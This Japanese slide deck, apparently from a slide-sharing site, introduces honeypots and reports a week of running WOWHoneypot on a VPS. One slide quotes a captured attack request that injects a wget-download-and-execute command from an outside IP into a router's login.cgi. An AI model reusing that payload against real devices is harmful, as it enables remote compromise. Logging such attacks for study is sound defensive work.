Recommended
More Related Content
More from shuna roo
More from shuna roo (12)
ハニーポットはじめてみました
- 2. 自己紹介 • 社会人6年目 • 1年目~5年目 : SIerでWebアプリ開発/技術支援/ CSIRT活動 • 6年目(今年): セキュリティエンジニア(仮) • 趣味 • 勉強会 • ジム(7月から) • ライブ(最近行けてない)
- 5. ハニーポットの種類 • 攻撃者とのやりとりの度合いによる分類(インタラクション) • 高対話型 • 実際のOSやアプリケーションを使ったやられシステム • 低対話型 • 実際のOSやアプリケーションを模して作ったやられシステム No インタラクション 使うOS/App 偽装性 安全性 製品 1 高対話型 本物 高 低 ・HiHAT ・Argos 2 低対話型 偽物 低 高 ・Dionaea ・Glastopf ・WOWHoneypot
- 7. ハニーポッターになるとよいこと • セキュリティの勉強になる(ざっくり) • セキュリティを勉強するためには No カテゴリ 方法 例 1 情報型 既にある情報から学ぶ ・本やネットを見る ・有識者に聞く 2 経験型 実際に攻撃してみる (犯罪は No) ・自分で環境を作って試す ・CTF 3 経験型 実際に攻撃を受けてみる ・ハニーポット ・ハードニング
- 8. ハニーポッターになる際の注意点 • 攻撃者の目的を達成させないこと • サーバを乗っ取られる • 踏み台に利用される など • クラウドやVPSを使用する場合は規約に違反しないこと • 基本的に運用自体はOKのサイトが多い模様
- 9. 実際に動かしてみた • 検証環境 • OS Ubuntu 18.04.1 x64 • Mem 1GB • Disk 25GB • VPS Digital Ocean • Honeypot WOWHoneypot • 検証期間 • 2018年7月29日 ~ 2018年8月4日
- 10. WOWHoneypotについて • Welcome to Omotenashi Web Honeypot • 攻撃者に気持ちよく攻撃してもらうことがコンセプト • 得られる攻撃ログの幅が広がる • どんなリクエストでも基本200を返す • ハニーポット初心者でも運用しやすい ・簡単実行(gitから持ってきて、実行するだけ) ・低対話型ハニーポットで比較的安全 • 詳しくは以下 https://github.com/morihisa/WOWHoneypot
- 12. 結果 • リクエスト総数 932 • リクエストURI種類 183 • ユニークなIP数 478 • 国数(whois) 70 • 国ランキングは勉強会時公開
- 13. 結果 • リクエスト(抜粋)一覧 • GET /.well-known/security.txt HTTP/1.1 • GET/login.cgi?cli=aa%20aa%27;wget%20http://199. 195.254.118/dlink%20-O%20- %3E%20/tmp/xd;sh%20/tmp/xd%27$ HTTP/1.1 • GET /manager/html HTTP/1.1 • GET /robots.txt HTTP/1.1 • GET /sitemap.xml HTTP/1.1 • GET /x HTTP/1.1 分析は今後していきます!
- 14. 課題 • ログ分析を簡単にしたい • 自動化したい(今回は手作業が多かった) • ビジュアル化したい • 攻撃の種類もどっかのDBと関連付けしたい
- 15. まとめ • ハニーポットは、あえて攻撃を受けることで、攻撃の手法や動向 を知るためのシステム • ハニーポッターとは、ハニーポットを運用している人 • ハニーポットには高対話型と低対話型がある • 低対話型ハニーポットWOWHoneypotを使ってみた (わりと攻撃されてる)
- 17. おしまい